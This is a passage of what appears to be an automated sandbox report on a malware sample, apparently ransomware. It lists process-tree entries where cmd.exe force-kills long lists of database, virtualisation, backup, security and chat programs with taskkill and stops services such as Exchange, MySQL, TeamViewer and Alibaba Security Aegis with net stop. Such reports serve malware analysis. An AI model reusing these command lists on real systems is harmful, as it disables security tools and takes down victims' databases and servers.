MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs.exe /F & @taskkill /IM jzmis.exe /F & @taskkill /IM NewFileTime_x64.exe /F & @taskkill /IM 2345MiniPage.exe /F & @taskkill /IM JMJ_server.exe /F & @taskkill /IM cacls.exe /F & @taskkill /IM gpsdaemon.exe /F & @taskkill /IM gpsusersvr.exe /F & @taskkill /IM gpsdownsvr.exe /F & @taskkill /IM gpsstoragesvr.exe /F & @taskkill /IM gpsdataprocsvr.exe /F & @taskkill /IM gpsftpd.exe /F & @taskkill /IM gpsmysqld.exe /F & @taskkill /IM gpstomcat6.exe /F & @taskkill /IM gpsloginsvr.exe /F & @taskkill /IM gpsmediasvr.exe /F & @taskkill /IM gpsgatewaysvr.exe /F & @taskkill /IM gpssvrctrl.exe /F & @taskkill /IM zabbix_agentd.exe /F"
    3⤵
    PID:220
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM pg_ctl.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7124
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM rcrelay.exe /F
      4⤵
      PID:1008
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SogouImeBroker.exe /F
      4⤵
      PID:7416
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM CCenter.exe /F
      4⤵
      PID:3512
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ScanFrm.exe /F
      4⤵
      PID:6784
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM d_manage.exe /F
      4⤵
      PID:6080
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM RsTray.exe /F
      4⤵
      Kills process with taskkill
      PID:7808
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM wampmanager.exe /F
      4⤵
      PID:1036
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM RavTray.exe /F
      4⤵
      PID:7756
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM mssearch.exe /F
      4⤵
      PID:3100
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sqlmangr.exe /F
      4⤵
      PID:7848
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM msftesql.exe /F
      4⤵
      Kills process with taskkill
      PID:3160
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SyncBaseSvr.exe /F
      4⤵
      PID:5288
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM oracle.exe /F
      4⤵
      PID:1308
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TNSLSNR.exe /F
      4⤵
      PID:4572
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SyncBaseConsole.exe /F
      4⤵
      Kills process with taskkill
      PID:5008
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM aspnet_state.exe /F
      4⤵
      PID:6880
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM AutoBackUpEx.exe /F
      4⤵
      PID:6312
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM redis-server.exe /F
      4⤵
      PID:6096
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM MySQLNotifier.exe /F
      4⤵
      Kills process with taskkill
      PID:7376
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM oravssw.exe /F
      4⤵
      Kills process with taskkill
      PID:6828
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM fppdis5.exe /F
      4⤵
      PID:7844
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM His6Service.exe /F
      4⤵
      PID:2256
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F"
    3⤵
    PID:4588
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ThunderPlatform.exe /F
      4⤵
      Kills process with taskkill
      PID:4548
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM iexplore.exe /F
      4⤵
      PID:1756
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM vm-agent-daemon.exe /F
      4⤵
      PID:3132
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM eSightService.exe /F
      4⤵
      PID:1664
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM cygrunsrv.exe /F
      4⤵
      PID:7012
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM wrapper.exe /F
      4⤵
      PID:8024
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM nginx.exe /F
      4⤵
      Kills process with taskkill
      PID:2912
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM node.exe /F
      4⤵
      PID:7380
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sshd.exe /F
      4⤵
      PID:5124
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM vm-tray.exe /F
      4⤵
      PID:4924
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM iempwatchdog.exe /F
      4⤵
      PID:3768
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM vm-agent.exe /F
      4⤵
      PID:6220
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sqlwriter.exe /F
      4⤵
      Kills process with taskkill
      PID:6684
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM php.exe /F
      4⤵
      PID:4900
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "notepad++.exe" /F
      4⤵
      Kills process with taskkill
      PID:5556
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "phpStudy.exe" /F
      4⤵
      PID:6676
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM OPCClient.exe /F
      4⤵
      PID:5392
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM navicat.exe /F
      4⤵
      PID:7944
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SupportAssistAgent.exe /F
      4⤵
      Kills process with taskkill
      PID:4304
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SunloginClient.exe /F
      4⤵
      PID:7412
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SOUNDMAN.exe /F
      4⤵
      PID:7496
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM WeChat.exe /F
      4⤵
      PID:8044
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TXPlatform.exe /F
      4⤵
      PID:5116
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F & @taskkill /IM QQprotect.exe /F & @taskkill /IM isqlplussvc.exe /F & @taskkill /IM nmesrvc.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM jusched.exe /F & @taskkill /IM MtxHotPlugService.exe /F & @taskkill /IM jucheck.exe /F & @taskkill /IM wordpad.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM chrome.exe /F & @taskkill /IM Thunder.exe /F"
    3⤵
    PID:7120
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sqlservr.exe /F
      4⤵
      PID:2256
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM httpd.exe /F
      4⤵
      PID:3768
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM java.exe /F
      4⤵
      PID:1172
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM fdlauncher.exe /F
      4⤵
      PID:6624
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM reportingservicesservice.exe /F
      4⤵
      PID:5888
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM softmgrlite.exe /F
      4⤵
      Kills process with taskkill
      PID:6512
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ssms.exe /F
      4⤵
      PID:6500
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM vmtoolsd.exe /F
      4⤵
      PID:7740
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM baidunetdisk.exe /F
      4⤵
      PID:7588
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM yundetectservice.exe /F
      4⤵
      PID:7676
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sqlbrowser.exe /F
      4⤵
      PID:4816
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ssclient.exe /F
      4⤵
      PID:6460
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GNAupdaemon.exe /F
      4⤵
      PID:3896
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM fdhost.exe /F
      4⤵
      PID:6544
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM RAVCp164.exe /F
      4⤵
      PID:5980
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM igfxEM.exe /F
      4⤵
      Kills process with taskkill
      PID:1172
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM igfxHK.exe /F
      4⤵
      PID:5472
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM igfxTray.exe /F
      4⤵
      PID:5252
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM 360bdoctor.exe /F
      4⤵
      PID:6584
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GNCEFExternal.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6316
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM PrivacyIconClient.exe /F
      4⤵
      PID:6344
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UIODetect.exe /F
      4⤵
      PID:6904
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM AutoDealService.exe /F
      4⤵
      PID:7788
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM IDDAService.exe /F
      4⤵
      PID:7468
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM EnergyDataService.exe /F
      4⤵
      PID:7692
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM MPService.exe /F
      4⤵
      PID:5892
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TransMain.exe /F
      4⤵
      PID:5428
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer & @net stop mysqltransport & @net stop VMnetDHCP & @net stop "VMware NAT Service" & @net stop Tomcat8 & @net stop TeamViewer & @net stop QPCore & @net stop CASLicenceServer & @net stop CASWebServer & @net stop AutoUpdateService & @net stop "Alibaba Security Aegis Detect Service" & @net stop "Alibaba Security Aegis Update Service" & @net stop "AliyunService" & @net stop CASXMLService & @net stop AGSService & @net stop RapService & @net stop DDNSService & @net stop iNethinkSQLBackupSvc & @net stop CASVirtualDiskService & @net stop CASMsgSrv & @net stop "OracleOraDb10g_homeliSQL*Plus" & @net stop OracleDBConsoleilas & @net stop MySQL & @net stop TPlusStdAppService1220 & @net stop TPlusStdTaskService1220 & @net stop TPlusStdUpgradeService1220 & @net stop K3MobileServiceManage & @net stop "FileZilla Server" & @net stop DDVRulesProcessor & @net stop ImtsEventSvr & @net stop AutoUpdatePatchService & @net stop OMAILREPORT & @net stop "Dell Hardware Support" & @net stop SupportAssistAgent & @net stop K3MMainSuspendService & @net stop KpService & @net stop ceng_web_svc_d & @net stop KugouService & @net stop pcas & @net stop U8SendMailAdmin & @net stop "Bonjour Service" & @net stop "Apple Mobile Device Service" & @net stop "ABBYY.Licensing.FineReader.Professional.12.0""
    3⤵
    PID:4796
  - - C:\Windows\SysWOW64\net.exe
      net stop UIODetect
      4⤵
      PID:2840
  - - C:\Windows\SysWOW64\net.exe
      net stop VMwareHostd
      4⤵
      PID:5460
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VMwareHostd
        5⤵
        
        PID:864
  - - C:\Windows\SysWOW64\net.exe
      net stop VMUSBArbService
      4⤵
      PID:7288
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VMUSBArbService
        5⤵
        
        PID:7320
  - - C:\Windows\SysWOW64\net.exe
      net stop TeamViewer8
      4⤵
      Discovers systems in the same network
      PID:276
  - - C:\Windows\SysWOW64\net.exe
      net stop VMAuthdService
      4⤵
      PID:6356
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VMAuthdService
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5456
  - - C:\Windows\SysWOW64\net.exe
      net stop wanxiao-monitor
      4⤵
      PID:6928
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop wanxiao-monitor
        5⤵
        
        PID:5764
  - - C:\Windows\SysWOW64\net.exe
      net stop WebAttendServer
      4⤵
      PID:6772
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop WebAttendServer
        5⤵
        
        PID:7788
  - - C:\Windows\SysWOW64\net.exe
      net stop mysqltransport
      4⤵
      PID:7360
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop mysqltransport
        5⤵
        
        PID:7596
  - - C:\Windows\SysWOW64\net.exe
      net stop VMnetDHCP
      4⤵
      PID:1364
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VMnetDHCP
        5⤵
        
        PID:7780
  - - C:\Windows\SysWOW64\net.exe
      net stop "VMware NAT Service"
      4⤵
      PID:2256
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "VMware NAT Service"
        5⤵
        
        PID:5780
  - - C:\Windows\SysWOW64\net.exe
      net stop Tomcat8
      4⤵
      PID:4232
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Tomcat8
        5⤵
        
        PID:4668
  - - C:\Windows\SysWOW64\net.exe
      net stop TeamViewer
      4⤵
      Discovers systems in the same network
      PID:5612
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TeamViewer
        5⤵
        
        PID:7420
  - - C:\Windows\SysWOW64\net.exe
      net stop QPCore
      4⤵
      PID:6124
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop QPCore
        5⤵
        
        PID:7976
  - - C:\Windows\SysWOW64\net.exe
      net stop CASLicenceServer
      4⤵
      PID:1724
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CASLicenceServer
        5⤵
        
        PID:6580
  - - C:\Windows\SysWOW64\net.exe
      net stop CASWebServer
      4⤵
      PID:6588
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CASWebServer
        5⤵
        
        PID:6452
  - - C:\Windows\SysWOW64\net.exe
      net stop AutoUpdateService
      4⤵
      PID:3136
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AutoUpdateService
        5⤵
        
        PID:6472
  - - C:\Windows\SysWOW64\net.exe
      net stop "Alibaba Security Aegis Detect Service"
      4⤵
      PID:7632
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Alibaba Security Aegis Detect Service"
        5⤵
        
        PID:6960
  - - C:\Windows\SysWOW64\net.exe
      net stop "Alibaba Security Aegis Update Service"
      4⤵
      PID:6136
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Alibaba Security Aegis Update Service"
        5⤵
        
        PID:7840
  - - C:\Windows\SysWOW64\net.exe
      net stop "AliyunService"
      4⤵
      PID:5416
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "AliyunService"
        5⤵
        
        PID:7432
  - - C:\Windows\SysWOW64\net.exe
      net stop CASXMLService
      4⤵
      PID:7516
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CASXMLService
        5⤵
        
        PID:7532
  - - C:\Windows\SysWOW64\net.exe
      net stop AGSService
      4⤵
      PID:2136
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AGSService
        5⤵
        
        PID:3256
  - - C:\Windows\SysWOW64\net.exe
      net stop RapService
      4⤵
      PID:4988
  - - C:\Windows\SysWOW64\net.exe
      net stop DDNSService
      4⤵
      PID:5248
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA"
    3⤵
    PID:3912
  - - C:\Windows\SysWOW64\net.exe
      net stop U8WorkerService1
      4⤵
      PID:1360
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop U8WorkerService1
        5⤵
        
        PID:3060
  - - C:\Windows\SysWOW64\net.exe
      net stop U8WorkerService2
      4⤵
      PID:6008
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop U8WorkerService2
        5⤵
        
        PID:764
  - - C:\Windows\SysWOW64\net.exe
      net stop "memcached Server"
      4⤵
      PID:4552
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "memcached Server"
        5⤵
        
        PID:6552
  - - C:\Windows\SysWOW64\net.exe
      net stop Apache2.4
      4⤵
      PID:1404
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Apache2.4
        5⤵
        
        PID:628
  - - C:\Windows\SysWOW64\net.exe
      net stop UFIDAWebService
      4⤵
      PID:6032
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop UFIDAWebService
        5⤵
        
        PID:1724
  - - C:\Windows\SysWOW64\net.exe
      net stop MSComplianceAudit
      4⤵
      PID:7088
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSComplianceAudit
        5⤵
        
        PID:5684
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeAntispamUpdate
      4⤵
      PID:3140
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeAntispamUpdate
        5⤵
        
        PID:7408
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeADTopology
      4⤵
      PID:7948
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeCompliance
      4⤵
      PID:7344
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeCompliance
        5⤵
        
        PID:7528
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeDagMgmt
      4⤵
      PID:4808
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeDelivery
      4⤵
      PID:5852
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeDelivery
        5⤵
        
        PID:5400
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeDiagnostics
